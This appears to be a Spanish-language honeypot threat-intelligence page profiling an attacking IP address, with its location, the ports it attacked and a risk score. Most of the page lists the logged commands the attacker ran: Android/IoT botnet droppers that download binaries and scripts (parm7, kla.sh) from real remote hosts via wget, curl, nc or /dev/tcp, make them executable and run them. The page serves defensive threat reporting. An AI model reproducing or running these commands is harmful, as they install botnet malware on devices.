Amenaza Activa • CRITICO
204.76.203.8
Pais de Origen🇳🇱 Paises Bajos
Primera Deteccion28/12/2025
Ultima Actividad22/2/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
4427
Ataques Totales
🔌
15
Puertos
📡
6
Tipos Ataque
🦠
0
Malware
Geolocalizacion
- Pais
- 🇳🇱 Paises Bajos
- Ciudad
- Eygelshoven
- ASN
- AS51396
- ISP
- Pfcloud UG (haftungsbeschrankt)
Tipos de Ataque
h0neytr4p
honeyaml
adbhoney
dionaea
tanner
honeytrap
Puertos Atacados
80814433000300131285555603680008081888817000456345500061616
Malware Asociado
Sin malware asociado
Comandos Ejecutados
$
cd /data/local/tmp 2>/dev/null || cd /tmp 2>/dev/null || cd /cache; rm -f parm7 parm5 parm6 parm; mkdir -p /data/local/tmp 2>/dev/null; (wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || busybox wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || curl -fsSL -o parm7 http://45.148.120.23/bins/parm7 2>/dev/null || nc 45.148.120.23 3338 > parm7 2>/dev/null || toybox nc 45.148.120.23 3338 > parm7 2>/dev/null || bash -c "cat < /dev/tcp/45.148.120.23/3338 > parm7" 2>/dev/null199x$
cd /data/local/tmp 2>/dev/null || cd /tmp 2>/dev/null || cd /cache; rm -f parm7 parm5 parm6 parm; mkdir -p /data/local/tmp 2>/dev/null; (wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || busybox wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || curl -fsSL -o parm7 http://45.148.120.23/bins/parm7 2>/dev/null || nc 45.148.120.23 3338 > parm7 2>/dev/null || toybox nc 45.148.120.23 3338 > parm7 2>/dev/null || bash -c "cat < /dev/tcp/45.148.120.23/3338 > parm7" 2>/dev/null26x$
cd /data/local/tmp; su 0 mkdir .wws || mkdir .wws; cd .wws; toybox nc 130.12.180.76 1007 > parm7; toybox nc 130.12.180.76 1005 > parm5; toybox nc 130.12.180.76 1006 > parm6; toybox nc 130.12.180.76 1004 > parm; su 0 chmod 777 parm7 parm5 parm6 parm || chmod 777 parm7 parm5 parm6 parm; su 0 ./parm7 arm7; ./parm5; ./parm6; ./parm; su 0 ./parm7 arm5 || ./parm5 arm5 || ./parm6 arm5 || ./parm arm5;23x$
cd /tmp 2>/dev/null || cd /data/local/tmp; rm -f parm7 parm5 parm6 parm; (wget -q -O parm7 http://130.12.180.76/bins/parm7 || busybox wget -q -O parm7 http://130.12.180.76/bins/parm7 || toybox nc 130.12.180.76 3338 > parm7 || nc 130.12.180.76 3338 > parm7); (wget -q -O parm5 http://130.12.180.76/bins/parm5 || busybox wget -q -O parm5 http://130.12.180.76/bins/parm5 || toybox nc 130.12.180.76 3336 > parm5 || nc 130.12.180.76 3336 > parm5); (wget -q -O parm6 http://130.12.180.76/bins/parm6 || busy18x$
cd /data/local/tmp; su 0 mkdir .wws || mkdir .wws; cd .wws; toybox nc 130.12.180.76 3338 > parm7; toybox nc 130.12.180.76 3336 > parm5; toybox nc 130.12.180.76 3337 > parm6; toybox nc 130.12.180.76 3335 > parm; su 0 chmod 777 parm7 parm5 parm6 parm || chmod 777 parm7 parm5 parm6 parm; su 0 ./parm7 arm7; ./parm5; ./parm6; ./parm; su 0 ./parm7 arm5 || ./parm5 arm5 || ./parm6 arm5 || ./parm arm5;15x$
cd /tmp 2>/dev/null || cd /data/local/tmp; rm -f parm7 parm5 parm6 parm; (wget -q -O parm7 http://185.232.205.249/bins/parm7 || busybox wget -q -O parm7 http://185.232.205.249/bins/parm7 || toybox nc 185.232.205.249 3338 > parm7 || nc 185.232.205.249 3338 > parm7); (wget -q -O parm5 http://185.232.205.249/bins/parm5 || busybox wget -q -O parm5 http://185.232.205.249/bins/parm5 || toybox nc 185.232.205.249 3336 > parm5 || nc 185.232.205.249 3336 > parm5); (wget -q -O parm6 http://185.232.205.249/11x$
cd /data/local/tmp 2>/dev/null || cd /tmp 2>/dev/null || cd /cache; rm -f kla.sh; wget -qO kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null || busybox wget -qO kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null || curl -sLo kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null || nc 45.148.120.23 3342 > kla.sh 2>/dev/null; [ -s kla.sh ] && chmod +x kla.sh 2>/dev/null && sh kla.sh 2>/dev/null &5x$
cd /tmp; rm -f parm7 parm5 parm6 parm; (wget -q -O parm7 http://130.12.180.76/bins/parm7 || busybox wget -q -O parm7 http://130.12.180.76/bins/parm7 || toybox nc 130.12.180.76 3338 > parm7 || nc 130.12.180.76 3338 > parm7); (wget -q -O parm5 http://130.12.180.76/bins/parm5 || busybox wget -q -O parm5 http://130.12.180.76/bins/parm5 || toybox nc 130.12.180.76 3336 > parm5 || nc 130.12.180.76 3336 > parm5); (wget -q -O parm6 http://130.12.180.76/bins/parm6 || busybox wget -q -O parm6 http://130.125x$
cd /tmp 2>/dev/null || cd /data/local/tmp; rm -f parm7 parm5 parm6 parm; (wget -q -O parm7 http://45.194.92.30/bins/parm7 || busybox wget -q -O parm7 http://45.194.92.30/bins/parm7 || toybox nc 45.194.92.30 3338 > parm7 || nc 45.194.92.30 3338 > parm7); (wget -q -O parm5 http://45.194.92.30/bins/parm5 || busybox wget -q -O parm5 http://45.194.92.30/bins/parm5 || toybox nc 45.194.92.30 3336 > parm5 || nc 45.194.92.30 3336 > parm5); (wget -q -O parm6 http://45.194.92.30/bins/parm6 || busybox wget 4x$
cd /data/local/tmp || cd /tmp || cd /cache; rm -f parm7 parm5 parm6 parm; wget -q -O parm7 http://45.148.120.23/bins/parm7 || busybox wget -q -O parm7 http://45.148.120.23/bins/parm7 || nc 45.148.120.23 3338 > parm7; wget -q -O parm5 http://45.148.120.23/bins/parm5 || busybox wget -q -O parm5 http://45.148.120.23/bins/parm5 || nc 45.148.120.23 3336 > parm5; wget -q -O parm6 http://45.148.120.23/bins/parm6 || busybox wget -q -O parm6 http://45.148.120.23/bins/parm6 || nc 45.148.120.23 3337 > parm4xEvaluacion de Riesgo
80
/100
BajoMedioAltoCritico